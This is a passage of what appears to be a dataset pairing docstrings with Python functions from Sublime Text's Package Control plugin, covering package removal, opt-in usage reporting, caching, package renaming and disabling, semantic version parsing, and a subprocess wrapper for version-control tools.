if (version_cmp <= old_version_cmp):
break
if (version_cmp > new_version_cmp):
continue
try:
upgrade_file = message_info.get(version)
upgrade_path = os.path.join(package_dir, upgrade_file)
output += read_message(upgrade_path)
except FileNotFoundError:
console_write(u'\n Error opening %s message for %s from %s\n ', (version, package, upgrade_file))
if (not output):
return
else:
output = (('\n\n%s\n%s\n' % (package, ('-' * len(package)))) + output)
def print_to_panel():
window = sublime.active_window()
views = window.views()
view = None
for _view in views:
if (_view.name() == 'Package Control Messages'):
view = _view
break
if (not view):
view = window.new_file()
view.set_name('Package Control Messages')
view.set_scratch(True)
view.settings().set('word_wrap', True)
view.settings().set('auto_indent', False)
view.settings().set('tab_width', 2)
else:
view.set_read_only(False)
if (window.active_view() != view):
window.focus_view(view)
def write(string):
view.run_command('insert', {'characters': string})
old_sel = list(view.sel())
old_vpos = view.viewport_position()
size = view.size()
view.sel().clear()
view.sel().add(sublime.Region(size, size))
if (not view.size()):
write(text.format(u'\n Package Control Messages\n ========================\n '))
write(output)
if (sublime.Region(size, size) == old_sel[(-1)]):
old_sel[(-1)] = sublime.Region(view.size(), view.size())
view.sel().clear()
for reg in old_sel:
view.sel().add(reg)
view.set_viewport_position(old_vpos, False)
view.set_read_only(True)
sublime.set_timeout(print_to_panel, 1)
|
'Deletes a package
The deletion process consists of:
1. Deleting the directory (or marking it for deletion if deletion fails)
2. Submitting usage info
3. Removing the package from the list of installed packages
:param package_name:
The package to delete
:return: bool if the package was successfully deleted or None
if the package needs to be cleaned up on the next restart
and should not be reenabled'
| def remove_package(self, package_name, is_dependency=False):
| if (not is_dependency):
installed_packages = self.list_packages()
else:
installed_packages = self.list_dependencies()
package_type = 'package'
if is_dependency:
package_type = 'dependency'
if (package_name not in installed_packages):
show_error(u'\n The %s specified, %s, is not installed\n ', (package_type, package_name))
return False
os.chdir(self.settings['packages_path'])
package_filename = (package_name + '.sublime-package')
installed_package_path = os.path.join(self.settings['installed_packages_path'], package_filename)
pristine_package_path = os.path.join(os.path.dirname(self.settings['packages_path']), 'Pristine Packages', package_filename)
package_dir = self.get_package_dir(package_name)
version = self.get_metadata(package_name, is_dependency=is_dependency).get('version')
cleanup_complete = True
try:
if os.path.exists(installed_package_path):
os.remove(installed_package_path)
except (OSError, IOError) as e:
cleanup_complete = False
try:
if os.path.exists(pristine_package_path):
os.remove(pristine_package_path)
except (OSError, IOError) as e:
show_error(u'\n An error occurred while trying to remove the pristine package\n file for %s.\n\n %s\n ', (package_name, unicode_from_os(e)))
return False
if os.path.exists(package_dir):
can_delete_dir = True
if (not clear_directory(package_dir)):
open_compat(os.path.join(package_dir, 'package-control.cleanup'), 'w').close()
cleanup_complete = False
can_delete_dir = False
params = {'package': package_name, 'operation': 'remove', 'version': version}
self.record_usage(params)
if (not is_dependency):
def save_names():
settings = sublime.load_settings(pc_settings_filename())
original_names = load_list_setting(settings, 'installed_packages')
names = list(original_names)
if (package_name in names):
names.remove(package_name)
save_list_setting(settings, pc_settings_filename(), 'installed_packages', names, original_names)
sublime.set_timeout(save_names, 1)
if (os.path.exists(package_dir) and can_delete_dir):
os.rmdir(package_dir)
if is_dependency:
loader.remove(package_name)
else:
message = (u'The package %s has been removed' % package_name)
if (not cleanup_complete):
message += u' and will be cleaned up on the next restart'
console_write(message)
self.cleanup_dependencies(package_name)
return (True if cleanup_complete else None)
|
'Submits install, upgrade and delete actions to a usage server
The usage information is currently displayed on the Package Control
website at https://packagecontrol.io
:param params:
A dict of the information to submit'
| def record_usage(self, params):
| if (not self.settings.get('submit_usage')):
return
params['package_control_version'] = self.get_metadata('Package Control').get('version')
params['sublime_platform'] = self.settings.get('platform')
params['sublime_version'] = self.settings.get('version')
for param in params:
if isinstance(params[param], str_cls):
params[param] = params[param].encode('utf-8')
url = ((self.settings.get('submit_url') + '?') + urlencode(params))
try:
with downloader(url, self.settings) as manager:
result = manager.fetch(url, 'Error submitting usage information.')
except DownloaderException as e:
console_write(e)
return
try:
result = json.loads(result.decode('utf-8'))
if (result['result'] != 'success'):
raise ValueError()
except ValueError:
console_write(u'\n Error submitting usage information for %s\n ', params['package'])
|
'Removes all cache entries older than the TTL
:param ttl:
The number of seconds a cache entry should be valid for'
| def clear(self, ttl):
| ttl = int(ttl)
for filename in os.listdir(self.base_path):
path = os.path.join(self.base_path, filename)
if os.path.isdir(path):
continue
mtime = os.stat(path).st_mtime
if (mtime < (time.time() - ttl)):
os.unlink(path)
|
'Returns a cached value
:param key:
The key to fetch the cache for
:return:
The (binary) cached value, or False'
| def get(self, key):
| cache_file = os.path.join(self.base_path, key)
if (not os.path.exists(cache_file)):
return False
with open_compat(cache_file, 'rb') as f:
return read_compat(f)
|
'Returns the filesystem path to the key
:param key:
The key to get the path for
:return:
The absolute filesystem path to the cache file'
| def path(self, key):
| return os.path.join(self.base_path, key)
|
'Saves a value in the cache
:param key:
The key to save the cache with
:param content:
The (binary) content to cache'
| def set(self, key, content):
| cache_file = os.path.join(self.base_path, key)
with open_compat(cache_file, 'wb') as f:
f.write(content)
|
'Loads the list of installed packages'
| def load_settings(self):
| settings = sublime.load_settings(pc_settings_filename())
self.original_installed_packages = load_list_setting(settings, 'installed_packages')
|
'Renames any installed packages that the user has installed.
:param installer:
An instance of :class:`PackageInstaller`'
| def rename_packages(self, installer):
| installer.manager.list_available_packages()
renamed_packages = installer.manager.settings.get('renamed_packages', {})
if (not renamed_packages):
renamed_packages = {}
installed_packages = list(self.original_installed_packages)
present_packages = installer.manager.list_packages()
case_insensitive_fs = (sublime.platform() in ['windows', 'osx'])
for (package_name, new_package_name) in renamed_packages.items():
changing_case = (package_name.lower() == new_package_name.lower())
if (case_insensitive_fs and changing_case and (package_name not in present_packages)):
continue
package_file = os.path.join(sublime.installed_packages_path(), (package_name + '.sublime-package'))
package_dir = os.path.join(sublime.packages_path(), package_name)
if os.path.exists(package_file):
new_package_path = os.path.join(sublime.installed_packages_path(), (new_package_name + '.sublime-package'))
package_path = package_file
elif os.path.exists(os.path.join(package_dir, 'package-metadata.json')):
new_package_path = os.path.join(sublime.packages_path(), new_package_name)
package_path = package_dir
else:
continue
sublime.set_timeout(partial(self.disable_packages, package_name, 'remove'), 10)
remove_result = True
if ((not os.path.exists(new_package_path)) or (case_insensitive_fs and changing_case)):
sublime.set_timeout(partial(self.disable_packages, new_package_name, 'install'), 10)
time.sleep(0.7)
if ((os.name == 'nt') and changing_case):
temp_package_name = ('__' + new_package_name)
temp_package_path = os.path.join(os.path.dirname(sublime.packages_path()), temp_package_name)
os.rename(package_path, temp_package_path)
package_path = temp_package_path
os.rename(package_path, new_package_path)
installed_packages.append(new_package_name)
console_write(u'\n Renamed %s to %s\n ', (package_name, new_package_name))
sublime.set_timeout(partial(self.reenable_package, new_package_name, 'install'), 700)
else:
time.sleep(0.7)
remove_result = installer.manager.remove_package(package_name)
console_write(u'\n Removed %s since package with new name (%s) already exists\n ', (package_name, new_package_name))
if (remove_result is not None):
sublime.set_timeout(partial(self.reenable_package, package_name, 'remove'), 700)
try:
installed_packages.remove(package_name)
except ValueError:
pass
sublime.set_timeout((lambda : self.save_packages(installed_packages)), 10)
|
'Saves the list of installed packages (after having been appropriately
renamed)
:param installed_packages:
The new list of installed packages'
| def save_packages(self, installed_packages):
| filename = pc_settings_filename()
settings = sublime.load_settings(filename)
save_list_setting(settings, filename, 'installed_packages', installed_packages, self.original_installed_packages)
|
'On Windows, .sublime-package files are locked when imported, so we must
disable the package, delete it and then re-enable the package.
:param name:
The name of the package
:param filename:
The filename of the package'
| def remove_package_file(self, name, filename):
| def do_remove():
try:
os.remove(filename)
console_write(u'\n Removed orphaned package %s\n ', name)
except OSError as e:
console_write(u'\n Unable to remove orphaned package %s - deferring until\n next start: %s\n ', (name, unicode_from_os(e)))
finally:
pref_filename = preferences_filename()
settings = sublime.load_settings(pref_filename)
ignored = load_list_setting(settings, 'ignored_packages')
new_ignored = list(ignored)
try:
new_ignored.remove(name)
except ValueError:
pass
save_list_setting(settings, pref_filename, 'ignored_packages', new_ignored, ignored)
pref_filename = preferences_filename()
settings = sublime.load_settings(pref_filename)
ignored = load_list_setting(settings, 'ignored_packages')
new_ignored = list(ignored)
new_ignored.append(name)
save_list_setting(settings, pref_filename, 'ignored_packages', new_ignored, ignored)
sublime.set_timeout(do_remove, 700)
|
'Detects if a package is compatible with the current Sublime Text install
:param metadata:
A dict from a metadata file
:return:
If the package is compatible'
| def is_compatible(self, metadata):
| sublime_text = metadata.get('sublime_text')
platforms = metadata.get('platforms', [])
if ((not sublime_text) and (not platforms)):
return True
if (not is_compatible_version(sublime_text)):
return False
if (not isinstance(platforms, list)):
platforms = [platforms]
platform_selectors = [((sublime.platform() + '-') + sublime.arch()), sublime.platform(), '*']
for selector in platform_selectors:
if (selector in platforms):
return True
return False
|
'A callback that can be run the main UI thread to perform saving of the
Package Control.sublime-settings file. Also fires off the
:class:`AutomaticUpgrader`.
:param installed_packages:
A list of the string package names of all "installed" packages,
even ones that do not appear to be in the filesystem.
:param found_packages:
A list of the string package names of all packages that are
currently installed on the filesystem.
:param found_dependencies:
A list of the string package names of all dependencies that are
currently installed on the filesystem.'
| def finish(self, installed_packages, found_packages, found_dependencies):
| pc_filename = pc_settings_filename()
pc_settings = sublime.load_settings(pc_filename)
in_process = load_list_setting(pc_settings, 'in_process_packages')
if in_process:
filename = preferences_filename()
settings = sublime.load_settings(filename)
ignored = load_list_setting(settings, 'ignored_packages')
new_ignored = list(ignored)
for package in in_process:
if (package in new_ignored):
if ((loader.loader_package_name == package) and loader.is_swapping()):
continue
console_write(u'\n The package %s is being re-enabled after a Package\n Control operation was interrupted\n ', package)
new_ignored.remove(package)
save_list_setting(settings, filename, 'ignored_packages', new_ignored, ignored)
save_list_setting(pc_settings, pc_filename, 'in_process_packages', [])
save_list_setting(pc_settings, pc_filename, 'installed_packages', installed_packages, self.original_installed_packages)
AutomaticUpgrader(found_packages, found_dependencies).start()
|
'Gets the current version of a package
:param package:
The name of the package
:return:
The string version'
| def get_version(self, package):
| if package_file_exists(package, 'package-metadata.json'):
metadata_json = read_package_file(package, 'package-metadata.json')
if metadata_json:
try:
return json.loads(metadata_json).get('version', 'unknown version')
except ValueError:
pass
return 'unknown version'
|
'Disables one or more packages before installing or upgrading to prevent
errors where Sublime Text tries to read files that no longer exist, or
read a half-written file.
:param packages:
The string package name, or an array of strings
:param type:
The type of operation that caused the package to be disabled:
- "upgrade"
- "remove"
- "install"
- "disable"
- "loader"
:return:
A list of package names that were disabled'
| def disable_packages(self, packages, type='upgrade'):
| global events
if (events is None):
from package_control import events
if (not isinstance(packages, list)):
packages = [packages]
disabled = []
settings = sublime.load_settings(preferences_filename())
ignored = load_list_setting(settings, 'ignored_packages')
pc_settings = sublime.load_settings(pc_settings_filename())
in_process = load_list_setting(pc_settings, 'in_process_packages')
PackageDisabler.old_color_scheme_package = None
PackageDisabler.old_color_scheme = None
PackageDisabler.old_theme_package = None
PackageDisabler.old_theme = None
PackageDisabler.old_syntaxes = {}
PackageDisabler.old_color_schemes = {}
for package in packages:
if (package not in ignored):
in_process.append(package)
ignored.append(package)
disabled.append(package)
if (type in ['upgrade', 'remove']):
version = self.get_version(package)
tracker_type = ('pre_upgrade' if (type == 'upgrade') else type)
events.add(tracker_type, package, version)
global_color_scheme = settings.get('color_scheme')
if ((global_color_scheme is not None) and (global_color_scheme.find((('Packages/' + package) + '/')) != (-1))):
PackageDisabler.old_color_scheme_package = package
PackageDisabler.old_color_scheme = global_color_scheme
settings.set('color_scheme', 'Packages/Color Scheme - Default/Monokai.tmTheme')
for window in sublime.windows():
for view in window.views():
view_settings = view.settings()
syntax = view_settings.get('syntax')
if ((syntax is not None) and (syntax.find((('Packages/' + package) + '/')) != (-1))):
if (package not in PackageDisabler.old_syntaxes):
PackageDisabler.old_syntaxes[package] = []
PackageDisabler.old_syntaxes[package].append([view, syntax])
view_settings.set('syntax', 'Packages/Text/Plain text.tmLanguage')
scheme = view_settings.get('color_scheme')
if ((scheme is not None) and (scheme != global_color_scheme) and (scheme.find((('Packages/' + package) + '/')) != (-1))):
if (package not in PackageDisabler.old_color_schemes):
PackageDisabler.old_color_schemes[package] = []
PackageDisabler.old_color_schemes[package].append([view, scheme])
view_settings.set('color_scheme', 'Packages/Color Scheme - Default/Monokai.tmTheme')
if package_file_exists(package, settings.get('theme')):
PackageDisabler.old_theme_package = package
PackageDisabler.old_theme = settings.get('theme')
settings.set('theme', 'Default.sublime-theme')
if (type != 'disable'):
save_list_setting(pc_settings, pc_settings_filename(), 'in_process_packages', in_process)
save_list_setting(settings, preferences_filename(), 'ignored_packages', ignored)
return disabled
|
'Re-enables a package after it has been installed or upgraded
:param package:
The string package name
:param type:
The type of operation that caused the package to be re-enabled:
- "upgrade"
- "remove"
- "install"
- "enable"
- "loader"'
| def reenable_package(self, package, type='upgrade'):
| global events
if (events is None):
from package_control import events
settings = sublime.load_settings(preferences_filename())
ignored = load_list_setting(settings, 'ignored_packages')
if (package in ignored):
if (type in ['install', 'upgrade']):
version = self.get_version(package)
tracker_type = ('post_upgrade' if (type == 'upgrade') else type)
events.add(tracker_type, package, version)
events.clear(tracker_type, package, future=True)
if (type == 'upgrade'):
events.clear('pre_upgrade', package)
elif (type == 'remove'):
events.clear('remove', package)
ignored = list((set(ignored) - set([package])))
save_list_setting(settings, preferences_filename(), 'ignored_packages', ignored)
corruption_notice = u' You may see some graphical corruption until you restart Sublime Text.'
if ((type == 'remove') and (PackageDisabler.old_theme_package == package)):
message = text.format(u'\n Package Control\n\n The package containing your active theme was just removed\n and the Default theme was enabled in its place.\n ')
if (int(sublime.version()) < 3106):
message += corruption_notice
sublime.message_dialog(message)
def delayed_settings_restore():
syntax_errors = set()
color_scheme_errors = set()
if (PackageDisabler.old_syntaxes is None):
PackageDisabler.old_syntaxes = {}
if (PackageDisabler.old_color_schemes is None):
PackageDisabler.old_color_schemes = {}
if ((type == 'upgrade') and (package in PackageDisabler.old_syntaxes)):
for view_syntax in PackageDisabler.old_syntaxes[package]:
(view, syntax) = view_syntax
if resource_exists(syntax):
view.settings().set('syntax', syntax)
elif (syntax not in syntax_errors):
console_write((u'The syntax "%s" no longer exists' % syntax))
syntax_errors.add(syntax)
if ((type == 'upgrade') and (PackageDisabler.old_color_scheme_package == package)):
if resource_exists(PackageDisabler.old_color_scheme):
settings.set('color_scheme', PackageDisabler.old_color_scheme)
else:
color_scheme_errors.add(PackageDisabler.old_color_scheme)
sublime.error_message(text.format(u'\n Package Control\n\n The package containing your active color scheme was\n just upgraded, however the .tmTheme file no longer\n exists. Sublime Text has been configured use the\n default color scheme instead.\n '))
if ((type == 'upgrade') and (package in PackageDisabler.old_color_schemes)):
for view_scheme in PackageDisabler.old_color_schemes[package]:
(view, scheme) = view_scheme
if resource_exists(scheme):
view.settings().set('color_scheme', scheme)
elif (scheme not in color_scheme_errors):
console_write((u'The color scheme "%s" no longer exists' % scheme))
color_scheme_errors.add(scheme)
if ((type == 'upgrade') and (PackageDisabler.old_theme_package == package)):
if package_file_exists(package, PackageDisabler.old_theme):
settings.set('theme', PackageDisabler.old_theme)
message = text.format(u'\n Package Control\n\n The package containing your active theme was just\n upgraded.\n ')
if (int(sublime.version()) < 3106):
message += corruption_notice
sublime.message_dialog(message)
else:
sublime.error_message(text.format(u'\n Package Control\n\n The package containing your active theme was just\n upgraded, however the .sublime-theme file no longer\n exists. Sublime Text has been configured use the\n default theme instead.\n '))
sublime.save_settings(preferences_filename())
sublime.set_timeout(delayed_settings_restore, 1000)
pc_settings = sublime.load_settings(pc_settings_filename())
in_process = load_list_setting(pc_settings, 'in_process_packages')
if (package in in_process):
in_process.remove(package)
save_list_setting(pc_settings, pc_settings_filename(), 'in_process_packages', in_process)
|
'There are two different constructor styles that are allowed:
- Option 1 allows specification of a semantic version as a string and the option to "clean"
the string before parsing it.
- Option 2 allows specification of each component separately as one parameter.
Note that all the parameters specified in the following sections can be passed either as
positional or as named parameters while considering the usual Python rules for this. As
such, `SemVer(1, 2, minor=1)` will result in an exception and not in `SemVer("1.1.2")`.
Option 1:
Constructor examples:
SemVer("1.0.1")
SemVer("this version 1.0.1-pre.1 here", True)
SemVer(ver="0.0.9-pre-alpha+34", clean=False)
Parameters:
* ver (str)
The string containing the version.
* clean = `False` (bool; optional)
If this is true in boolean context, `SemVer.clean(ver)` is called before
parsing.
Option 2:
Constructor examples:
SemVer(1, 0, 1)
SemVer(1, \'0\', prerelease=\'pre-alpha\', patch=1, build=34)
SemVer(**dict(minor=2, major=1, patch=3))
Parameters:
* major (int, str, float ...)
* minor (...)
* patch (...)
Major to patch components must be an integer or convertable to an int (e.g. a
string or another number type).
* prerelease = `None` (str, int, float ...; optional)
* build = `None` (...; optional)
Pre-release and build components should be a string (or number) type.
Will be passed to `str()` if not already a string but the final string must
match \'^[0-9A-Za-z.-]*$\'
Raises:
* TypeError
Invalid parameter type(s) or combination (e.g. option 1 and 2).
* ValueError
Invalid semantic version or option 2 parameters unconvertable.'
| def __new__(cls, *args, **kwargs):
| (ver, clean, comps) = (None, False, None)
(kw, l) = (kwargs.copy(), (len(args) + len(kwargs)))
def inv():
raise TypeError(('Invalid parameter combination: args=%s; kwargs=%s' % (args, kwargs)))
if ((l == 0) or (l > 5)):
raise TypeError(('SemVer accepts at least 1 and at most 5 arguments (%d given)' % l))
elif (l < 3):
if (len(args) == 2):
(ver, clean) = args
else:
ver = (args[0] if args else kw.pop('ver', None))
clean = kw.pop('clean', clean)
if kw:
inv()
else:
comps = (list(args) + [kw.pop(cls._fields[k], None) for k in range(len(args), 5)])
if (kw or any(((comps[i] is None) for i in range(3)))):
inv()
typecheck = (((int,) * 3) + ((basestring,) * 2))
for (i, (v, t)) in enumerate(zip(comps, typecheck)):
if (v is None):
continue
elif (not isinstance(v, t)):
try:
if (i < 3):
v = typecheck[i](v)
else:
v = str(v)
except ValueError as e:
e.args = (('Parameter #%d must be of type %s or convertable' % (i, t.__name__)),)
raise
else:
comps[i] = v
if ((t is basestring) and (not re.match('^[0-9A-Za-z.-]*$', v))):
raise ValueError("Build and pre-release strings must match '^[0-9A-Za-z.-]*$'")
if (not comps):
if ((ver is None) or (clean is None)):
inv()
ver = ((clean and cls.clean(ver)) or ver)
comps = cls._parse(ver)
return super(SemVer, cls).__new__(cls, *comps)
|
'Alias for `bool(sel.matches(self))` or `bool(SemSel(sel).matches(self))`.
See `SemSel.__init__()` and `SemSel.matches(*vers)` for possible exceptions.
Returns:
* bool: `True` if the version matches the passed selector, `False` otherwise.'
| def satisfies(self, sel):
| if (not isinstance(sel, SemSel)):
sel = SemSel(sel)
return bool(sel.matches(self))
|
'Check if `ver` is a valid semantic version. Classmethod.
Parameters:
* ver (str)
The string that should be stripped.
Raises:
* TypeError
Invalid parameter type.
Returns:
* bool: `True` if it is valid, `False` otherwise.'
| @classmethod
def valid(cls, ver):
| if (not isinstance(ver, basestring)):
raise TypeError(('%r is not a string' % ver))
if cls._match_regex.match(ver):
return True
else:
return False
|
'Remove everything before and after a valid version string. Classmethod.
Parameters:
* vers (str)
The string that should be stripped.
Raises:
* TypeError
Invalid parameter type.
Returns:
* str: The stripped version string. Only the first version is matched.
* None: No version found in the string.'
| @classmethod
def clean(cls, vers):
| if (not isinstance(vers, basestring)):
raise TypeError(('%r is not a string' % vers))
m = cls._search_regex.search(vers)
if m:
return vers[m.start():m.end()]
else:
return None
|
'Private. Do not touch. Classmethod.'
| @classmethod
def _parse(cls, ver):
| if (not isinstance(ver, basestring)):
raise TypeError(('%r is not a string' % ver))
match = cls._match_regex.match(ver)
if (match is None):
raise ValueError(("'%s' is not a valid SemVer string" % ver))
g = list(match.groups())
for i in range(3):
g[i] = int(g[i])
return g
|
'Private. Do not touch.
self > other: 1
self = other: 0
self < other: -1'
| def _compare(self, other):
| def cp_len(t, i=0):
return cmp(len(t[i]), len(t[(not i)]))
for (i, (x1, x2)) in enumerate(zip(self, other)):
if (i > 2):
if ((x1 is None) and (x2 is None)):
continue
if ((x1 is None) or (x2 is None)):
return (int((2 * (i - 3.5))) * (1 - (2 * (x1 is None))))
if ((i == 4) and ((not x1) or (not x2)) and (x1 != x2)):
return (1 - (2 * bool(x1)))
t2 = [x1.split('.'), x2.split('.')]
for (y1, y2) in zip(*t2):
if (y1.isdigit() and y2.isdigit()):
y1 = int(y1)
y2 = int(y2)
if (y1 > y2):
return 1
elif (y1 < y2):
return (-1)
d = cp_len(t2)
if d:
return d
elif (x1 > x2):
return 1
elif (x1 < x2):
return (-1)
return 0
|
'Constructor examples:
SemComparator(\'<=\', SemVer("1.2.3"))
SemComparator(\'!=\', SemVer("2.3.4"))
Parameters:
* op (str, False, None)
One of [>=, <=, >, <, =, !=, !, ~] or evaluates to `False` which defaults to \'~\'.
\'~\' means a "satisfy" operation where pre-releases and builds are ignored.
\'!\' is a negative "~".
* ver (SemVer)
Holds the version to compare with.
Raises:
* ValueError
Invalid `op` parameter.
* TypeError
Invalid `ver` parameter.'
| def __init__(self, op, ver):
| super(SemComparator, self).__init__()
if (op and (op not in self._ops_satisfy) and (op not in self._ops)):
raise ValueError('Invalid value for `op` parameter.')
if (not isinstance(ver, SemVer)):
raise TypeError('`ver` parameter is not instance of SemVer.')
op = (op or '~')
if (len(ver) != 3):
if (op == '~'):
op = '='
if (op == '!'):
op = '!='
self.op = op
self.ver = ver
|
'Match the internal version (constructor) against `ver`.
Parameters:
* ver (SemVer)
Raises:
* TypeError
Could not compare `ver` against the version passed in the constructor with the
passed operator.
Returns:
* bool
`True` if the version matched the specified operator and internal version, `False`
otherwise.'
| def matches(self, ver):
| if (self.op in self._ops_satisfy):
return bool(((self.ver[:3] == ver[:3]) + ((self.op == '!') * (-1))))
ret = getattr(ver, self._ops[self.op])(self.ver)
if (ret == NotImplemented):
raise TypeError(("Unable to compare %r with operator '%s'" % (ver, self.op)))
return ret
|
'Match all of the added children against `ver`.
Parameters:
* ver (SemVer)
Raises:
* TypeError
Invalid `ver` parameter.
Returns:
* bool:
`True` if *all* of the SemComparator children match `ver`, `False` otherwise.'
| def matches(self, ver):
| if (not isinstance(ver, SemVer)):
raise TypeError('`ver` parameter is not instance of SemVer.')
return all((cp.matches(ver) for cp in self))
|
'Create a SemComparator instance with the given parameters and appends that to self.
Parameters:
* op (str)
* ver (SemVer)
Both parameters are forwarded to `SemComparator.__init__`, see there for a more detailed
description.
Raises:
Exceptions raised by `SemComparator.__init__`.'
| def add_child(self, op, ver):
| self.append(SemComparator(op, SemVer(ver)))
|
'Match all of the added children against `ver`.
Parameters:
* ver (SemVer)
Raises:
* TypeError
Invalid `ver` parameter.
Returns:
* bool
`True` if *any* of the SemSelAndChunk children matches `ver`.
`False` otherwise.'
| def matches(self, ver):
| if (not isinstance(ver, SemVer)):
raise TypeError('`ver` parameter is not instance of SemVer.')
return any((ch.matches(ver) for ch in self))
|
'Creates a new SemSelAndChunk instance, appends it to self and returns it.
Returns:
* SemSelAndChunk: An empty instance.'
| def new_child(self):
| ch = SemSelAndChunk()
self.append(ch)
return ch
|
'Constructor examples:
SemSel(">1.0.0")
SemSel("~1.2.9 !=1.2.12")
Parameters:
* sel (str)
A version selector string.
Raises:
* TypeError
`sel` parameter is not a string.
* ValueError
A version in the selector could not be matched as a SemVer.
* SemParseError
The version selector\'s syntax is unparsable; invalid ranges (fuzzy, xrange or
explicit range) or invalid \'||\''
| def __new__(cls, sel):
| chunk = cls._parse(sel)
return super(SemSel, cls).__new__(cls, (chunk,))
|
'Match the selector against a selection of versions.
Parameters:
* *vers (str, SemVer)
Versions can be passed as strings and SemVer objects will be created with them.
May also be a mixed list.
Raises:
* TypeError
A version is not an instance of str (basestring) or SemVer.
* ValueError
A string version could not be parsed as a SemVer.
Returns:
* list
A list with all the versions that matched, may be empty. Use `max()` to determine
the highest matching version, or `min()` for the lowest.'
| def matches(self, *vers):
| ret = []
for v in vers:
if isinstance(v, str):
t = self._chunk.matches(SemVer(v))
elif isinstance(v, SemVer):
t = self._chunk.matches(v)
else:
raise TypeError(("Invalid parameter type '%s': %s" % (v, type(v))))
if t:
ret.append(v)
return ret
|
'Private. Do not touch.
1. split by whitespace into tokens
a. start new and_chunk on \' || \'
b. parse " - " ranges
c. replace "xX*" ranges with "~" equivalent
d. parse "~" ranges
e. parse unmatched token as comparator
~. append to current and_chunk
2. return SemSelOrChunk
Raises TypeError, ValueError or SelParseError.'
| @classmethod
def _parse(cls, sel):
| if (not isinstance(sel, basestring)):
raise TypeError('Selector must be a string')
if (not sel):
raise ValueError('String must not be empty')
tokens = sel.split()
i = (-1)
or_chunk = SemSelOrChunk()
and_chunk = or_chunk.new_child()
while ((i + 1) < len(tokens)):
i += 1
t = tokens[i]
m = cls._xrange_regex.match(t)
m = (m and m.groups(''))
if (m and any(((not x.isdigit()) for x in m[1:4])) and (not m[0].startswith('>'))):
if m[4]:
raise SelParseError('XRanges do not allow pre-release or build components')
(mm, xran) = ([], False)
for x in m[1:4]:
if x.isdigit():
if xran:
raise SelParseError(("Invalid fuzzy range or XRange '%s'" % tokens[i]))
mm.append(x)
else:
xran = True
t = (m[0] + '.'.join(mm))
if (not t.startswith('~')):
t = ('~' + t)
if (t == '||'):
if ((i == 0) or (tokens[(i - 1)] == '||') or ((i + 1) == len(tokens))):
raise SelParseError('OR range must not be empty')
and_chunk = or_chunk.new_child()
elif (t == '-'):
i += 1
invalid = False
try:
t = tokens[i]
c = and_chunk[(-1)]
except:
raise SelParseError("Invalid ' - ' range position")
invalid = ((c.op not in ('=', '~')) or (cls._split_op_regex.match(t).group(1) not in (None, '=')))
if invalid:
raise SelParseError(("Invalid ' - ' range '%s - %s'" % (tokens[(i - 2)], tokens[i])))
c.op = '>='
and_chunk.add_child('<=', t)
elif (t == ''):
pass
elif t.startswith('~'):
m = cls._fuzzy_regex.match(t)
if (not m):
raise SelParseError(("Invalid fuzzy range or XRange '%s'" % tokens[i]))
(mm, m) = (m.groups('')[1:4], m.groupdict(''))
min_ver = (('.'.join(((x or '0') for x in mm)) + '-') if (not m['other']) else cls._split_op_regex(t[1:]).group('ver'))
and_chunk.add_child('>=', min_ver)
if m['major']:
e = [0, 0, 0]
for (j, d) in enumerate(mm):
if ((not d) or (j == (len(mm) - 1))):
e[(j - 1)] = (e[(j - 1)] + 1)
break
e[j] = int(d)
and_chunk.add_child('<', ('.'.join((str(x) for x in e)) + '-'))
else:
m = cls._split_op_regex.match(t).groupdict()
and_chunk.add_child(**m)
return or_chunk
|
'Creates a subprocess with the executable/args
:param args:
A list of the executable path and all arguments to it
:param cwd:
The directory in which to run the executable
:param input:
The input text to send to the program
:param meaningful_output:
If the output from the command is possibly meaningful and should
be displayed if in debug mode
:param ignore_errors:
A regex of errors to ignore
:return:
A string of the executable output or False on error'
| def execute(self, args, cwd, input=None, encoding='utf-8', meaningful_output=False, ignore_errors=None):
| orig_cwd = cwd
startupinfo = None
if (os.name == 'nt'):
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
try:
cwd.encode('mbcs')
except UnicodeEncodeError:
buf = create_unicode_buffer(512)
if windll.kernel32.GetShortPathNameW(cwd, buf, len(buf)):
cwd = buf.value
if self.debug:
console_write(u'\n Executing %s [%s]\n ', (create_cmd(args), cwd))
try:
if ((sys.platform == 'win32') and (sys.version_info < (3,))):
cwd = cwd.encode('mbcs')
proc = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, startupinfo=startupinfo, cwd=cwd, env=os.environ)
if (input and isinstance(input, str_cls)):
input = input.encode(encoding)
stuck = True
binary_name = os.path.basename(args[0])
if re.search('git', binary_name):
is_vcs = True
elif re.search('hg', binary_name):
is_vcs = True
if sublime:
def kill_proc():
if (not stuck):
return
proc.kill()
message = text.format(u'\n The process %s seems to have gotten stuck.\n\n Command: %s\n\n Working directory: %s\n ', (binary_name, create_cmd(args), orig_cwd))
if is_vcs:
message += text.format(u'\n\n This is likely due to a password or passphrase\n prompt. Please ensure %s works without a prompt, or\n change the "ignore_vcs_packages" Package Control\n setting to true.\n\n Sublime Text will need to be restarted once these\n changes are made.\n ', binary_name)
show_error(message)
sublime.set_timeout(kill_proc, 60000)
(output, _) = proc.communicate(input)
stuck = False
output = output.decode(encoding)
output = output.replace('\r\n', '\n').rstrip(' \n\r')
if (proc.returncode not in self.ok_returncodes):
if ((not ignore_errors) or (re.search(ignore_errors, output) is None)):
message = text.format(u'\n Error executing: %s\n\n Working directory: %s\n\n %s\n ', (create_cmd(args), orig_cwd, output))
if is_vcs:
message += text.format('\n\n VCS-based packages can be ignored by changing the\n "ignore_vcs_packages" setting to true.\n\n Sublime Text will need to be restarted once the\n setting is changed.\n ')
show_error(message)
return False
if (meaningful_output and self.debug and (len(output) > 0)):
console_write(output, indent=' ', prefix=False)
return output
except OSError as e:
show_error(u'\n Error executing: %s\n\n %s\n\n Try checking your "%s_binary" setting?\n ', (create_cmd(args), unicode_from_os(e), self.cli_name))
return False
|
'Locates the executable by looking in the PATH and well-known directories
:param name:
The string filename of the executable
:return:
The filesystem path to the executable, or None if not found'
| def find_binary(self, name):
| if (self.cli_name in Cli.binary_paths):
return Cli.binary_paths[self.cli_name]
check_binaries = []
if self.binary_locations:
if (not isinstance(self.binary_locations, list)):
self.binary_locations = [self.binary_locations]
check_binaries.extend(self.binary_locations)
for dir_ in os.environ['PATH'].split(os.pathsep):
check_binaries.append(os.path.join(dir_, name))
if (os.name == 'nt'):
